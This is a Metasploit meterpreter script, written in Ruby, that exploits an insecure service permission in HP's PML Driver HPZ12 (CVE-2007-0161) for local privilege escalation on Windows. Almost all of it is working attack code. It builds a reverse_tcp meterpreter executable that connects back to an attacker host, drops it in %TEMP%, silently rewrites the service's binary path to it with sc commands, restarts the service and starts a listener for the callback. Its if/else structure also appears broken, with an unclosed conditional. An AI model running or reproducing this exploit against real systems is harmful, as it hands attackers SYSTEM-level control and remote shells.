metasploit-framework/scripts/meterpreter/pml_driver_config.rb

117 lines
3.5 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# https://metasploit.com/framework/
##
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
##
# HP Multiple Products PML Driver HPZ12 Local Privilege Escalation.
#
# This module exploits a privilege escalation vulnerability in
# Hewlett-Packard's PML Driver HPZ12. Due to an insecure
# SERVICE_CHANGE_CONFIG DACL permission, a local attacker can
# gain elevated privileges.
#
# BID - 21935
# CVE - 2007-0161
# mc[@]metasploit.com
##
#
# Options
#
@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu" ],
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back" ],
"-p" => [ true, "The port on the remote host where Metasploit is listening" ]
)
#
# Default parameters
#
rhost = nil
rport = nil
def usage
print_status("HP PML Driver HPZ12 SERVICE_CHANGE_CONFIG privilege escalation.")
print_line(@exec_opts.usage)
raise Rex::Script::Completed
end
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-r"
rhost = val
when "-p"
rport = val.to_i
else
usage
end
end
if rhost.nil? or rport.nil?
usage
if client.platform == 'windows'
client.sys.process.get_processes().each do |m|
if ( m['name'] =~ /HPZipm12\.exe/ )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
print_status("Stopping service \"Pml Driver HPZ12\"...")
client.sys.process.execute("cmd.exe /c sc stop \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
print_status("Setting Pml Driver to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
sleep(1)
print_status("Restarting the \"Pml Driver HPZ12\" service...")
client.sys.process.execute("cmd.exe /c sc start \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['WORKSPACE'] = client.workspace
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= %SystemRoot%\\system32\\HPZipm12.exe", nil, {'Hidden' => 'true'})
end
end
else
print_error("This version of Meterpreter is not supported with this script!")
raise Rex::Script::Completed
end